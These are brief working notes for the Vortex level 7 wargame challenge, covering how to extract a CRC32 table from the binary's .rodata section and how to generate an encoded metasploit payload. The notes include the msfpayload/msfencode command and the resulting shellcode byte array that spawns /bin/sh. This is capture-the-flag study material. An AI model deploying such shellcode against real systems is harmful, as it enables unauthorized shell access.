VORTEX7 notes

test: crc32("asdf") = 0x5129F3BD

crc32 tbl offset: 0x80485e0 (situated in .rodata section)

extract crc32 table from binary:

readelf -x .rodata vortex7 | less

# copy contents of .rodata into a binary file
objcopy -O binary -j .rodata -S -v vortex7 rodata

# truncate 32bytes at beginning of file
dd bs=1 skip=32 if=rodata of=crc32_table

vortex7 uses crc32 with INITXOR=0x0 and FINALXOR=0x0

generate metasploit payload:
./msfpayload linux/x64/exec CMD="/bin/sh" R | ./msfencode -e x86/call4_dword_xor -t c

[*] x86/call4_dword_xor succeeded with size 72 (iteration=1)

unsigned char buf[] = 
"\x33\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x46\x39\x60\xa5\x83\xee\xfc\xe2\xf4\x2c\x02\x38\x3c\x0e\x82"
"\x4f\xc7\x2f\x57\x4f\xd6\x2e\x39\x33\xed\xcf\xde\x08\x88\x25"
"\x39\x60\xed\xcf\xdf\x32\x4d\x4e\x39\x60\xa5\x69\x5b\x09\xcb"
"\x69\x4a\x08\xa5\x10\x6e\x28\x2c\xa0\x36\x65\xa5";
